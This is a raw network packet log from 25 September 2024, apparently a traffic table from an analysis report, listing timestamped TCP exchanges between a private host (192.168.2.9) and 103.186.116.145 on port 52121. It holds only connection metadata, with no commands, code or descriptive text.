                      Sep 25, 2024 19:49:04.972573042 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:04.977032900 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.528837919 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:05.543582916 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.883548975 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.914943933 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:05.916260004 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:05.922329903 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922341108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922349930 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922415018 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922425985 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922435045 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922527075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922535896 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922544003 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922720909 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922730923 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922739983 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922754049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.922763109 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923456907 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923465967 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923475027 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923717976 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923728943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923738956 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.923749924 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:05.924041986 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.544791937 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:06.550420046 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.872687101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.920965910 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:06.922293901 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:06.926103115 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926259041 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926418066 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926426888 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926485062 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926672935 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926683903 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926772118 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926780939 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926789999 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926800966 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926810026 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926820040 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.926829100 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932344913 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932574034 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932704926 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.932996988 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933006048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933015108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933027029 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:06.933037043 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.561249971 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:07.578579903 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.900851011 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.950454950 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:07.951919079 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:07.955373049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955559015 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955568075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955575943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955904007 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955913067 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955920935 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955930948 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955940962 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955955982 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.955965042 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956001997 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956010103 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956018925 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956775904 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956823111 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956831932 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956872940 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.956881046 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.957091093 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.957098961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:07.957254887 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.578924894 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.584001064 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.902595997 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.950562954 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.950802088 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.952178001 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:08.955774069 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956003904 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956012964 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956022978 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956129074 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956137896 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956146955 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956233025 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.956720114 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960530043 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960539103 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960578918 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960594893 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960659981 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960690022 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960694075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960762978 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960772991 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960876942 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960886002 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960896969 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960907936 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:08.960916996 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.591706991 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:09.596657038 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.924777031 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.962579012 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:09.963793039 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:09.967700005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967720985 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967784882 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967794895 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967803955 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967814922 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967864990 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.967907906 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.968007088 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.968017101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972593069 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972608089 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972750902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972763062 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972784042 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972814083 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972822905 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972862005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.972871065 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.973053932 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.973063946 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:09.973144054 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.607218981 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:10.612205982 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.931153059 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.963779926 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:10.965061903 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:10.971797943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971829891 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971838951 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971848011 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971862078 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.971869946 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.974531889 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.974544048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.974553108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977873087 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977883101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977966070 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977977037 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.977984905 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978117943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978127956 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978136063 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978143930 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978152990 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.978161097 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.980771065 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:10.980782986 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.622525930 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:11.627571106 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.946424961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.977950096 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:11.979167938 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:11.984889984 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.984941006 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.984951019 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.984961033 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.984972954 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.984982967 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.984992027 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.985075951 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.985228062 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.985239983 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.990605116 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.990614891 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.990736008 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.990748882 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.990871906 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.990880966 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.990890980 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.991012096 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.991025925 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.991034985 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.991044044 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:11.991053104 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:12.638187885 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:12.643305063 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:12.961687088 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.018224001 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:13.019970894 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:13.023184061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023202896 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023215055 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023224115 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023231983 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023255110 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023338079 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023349047 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023360968 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.023509979 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.027954102 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.027965069 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.027975082 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028023005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028032064 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028116941 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028126001 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028135061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028143883 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028162956 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028171062 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.028181076 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.653781891 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:13.658704042 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:13.978126049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.040520906 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:14.041834116 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:14.045800924 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045814037 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045933008 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045941114 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045949936 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045958042 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045965910 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045974970 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045983076 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.045990944 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050641060 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050656080 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050791979 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050801039 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050807953 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050817013 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050930977 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050940990 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050949097 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050956964 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050965071 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.050972939 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:14.669712067 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:14.675777912 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.011351109 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.056529045 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:15.057801962 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:15.061393023 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061407089 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061439037 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061448097 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061563015 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061572075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061594963 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061635971 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061685085 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.061693907 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.066919088 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.066929102 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.066986084 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067013025 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067023039 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067085028 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067100048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067179918 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067190886 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067238092 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067265034 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.067327976 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:15.685385942 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:15.690387011 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.012428999 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.056519032 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:16.057923079 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:16.061520100 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061548948 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061559916 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061572075 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061583996 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061599016 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061700106 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061712980 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061727047 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.061821938 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066366911 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066378117 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066405058 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066416979 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066427946 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066448927 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066459894 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066483021 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066493988 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066528082 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066539049 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.066550016 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.327150106 CEST5212149709103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.328464031 CEST4970952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:16.333288908 CEST5212149709103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:16.701124907 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:16.908902884 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.230745077 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.278604031 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:17.290345907 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:17.291713953 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:17.295327902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295345068 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295357943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295361996 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295397997 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295406103 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295443058 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295454025 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.295464039 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.299988031 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300023079 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300050020 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300121069 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300148010 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300199986 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300226927 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300303936 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300329924 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300357103 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300381899 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300407887 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.300434113 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:17.716267109 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:17.721312046 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:18.040347099 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:18.091043949 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:18.100292921 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:18.102190971 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:18.105367899 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:18.105407000 CEST5212149720103.186.116.145192.168.2.9
